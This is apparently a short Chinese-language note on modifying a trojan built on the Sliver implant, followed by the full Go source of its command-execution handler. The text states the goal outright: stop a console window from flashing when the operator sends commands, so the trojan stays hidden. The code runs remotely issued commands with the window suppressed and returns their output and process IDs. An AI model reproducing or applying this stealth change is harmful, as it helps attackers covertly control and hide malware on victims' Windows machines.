向木马发出指令后, 如果是cmd命令会有一个黑窗口一闪而灭, 不利于木马隐藏, 需要将executeHandler从handlers.go拷贝到handlers_windows.go里,核心代码为 cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}表示隐藏命令弹窗
func executeHandler(data []byte, resp RPCResponse) {
var (
err error
stdErr io.Writer
stdOut io.Writer
errWriter *bufio.Writer
outWriter *bufio.Writer
)
execReq := &sliverpb.ExecuteReq{}
err = proto.Unmarshal(data, execReq)
if err != nil {
// {{if .Config.Debug}}
log.Printf("error decoding message: %v", err)
// {{end}}
return
}
execResp := &sliverpb.Execute{}
exePath, err := expandPath(execReq.Path)
if err != nil {
execResp.Response = &commonpb.Response{
Err: fmt.Sprintf("%s", err),
}
proto.Marshal(execResp)
resp(data, err)
return
}
cmd := exec.Command(exePath, execReq.Args...)
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
if execReq.Output {
stdOutBuff := new(bytes.Buffer)
stdErrBuff := new(bytes.Buffer)
stdErr = stdErrBuff
stdOut = stdOutBuff
if execReq.Stderr != "" {
stdErrFile, err := os.Create(execReq.Stderr)
if err != nil {
execResp.Response = &commonpb.Response{
Err: fmt.Sprintf("%s", err),
}
proto.Marshal(execResp)
resp(data, err)
return
}
defer stdErrFile.Close()
errWriter = bufio.NewWriter(stdErrFile)
stdErr = io.MultiWriter(errWriter, stdErrBuff)
}
if execReq.Stdout != "" {
stdOutFile, err := os.Create(execReq.Stdout)
if err != nil {
execResp.Response = &commonpb.Response{
Err: fmt.Sprintf("%s", err),
}
proto.Marshal(execResp)
resp(data, err)
return
}
defer stdOutFile.Close()
outWriter = bufio.NewWriter(stdOutFile)
stdOut = io.MultiWriter(outWriter, stdOutBuff)
}
cmd.Stdout = stdOut
cmd.Stderr = stdErr
err := cmd.Run()
//{{if .Config.Debug}}
log.Printf("Exec (%v): %s", err, string(stdOutBuff.String()))
//{{end}}
if err != nil {
// Exit errors are not a failure of the RPC, but of the command.
if exiterr, ok := err.(*exec.ExitError); ok {
execResp.Status = uint32(exiterr.ExitCode())
} else {
execResp.Response = &commonpb.Response{
Err: fmt.Sprintf("%s", err),
}
}
}
if errWriter != nil {
errWriter.Flush()
}
if outWriter != nil {
outWriter.Flush()
}
execResp.Stderr = stdErrBuff.Bytes()
execResp.Stdout = stdOutBuff.Bytes()
if cmd.Process != nil {
execResp.Pid = uint32(cmd.Process.Pid)
}
} else {
err = cmd.Start()
if err != nil {
execResp.Response = &commonpb.Response{
Err: fmt.Sprintf("%s", err),
}
}
go func() {
cmd.Wait()
}()
if cmd.Process != nil {
execResp.Pid = uint32(cmd.Process.Pid)
}
}
data, err = proto.Marshal(execResp)
resp(data, err)
}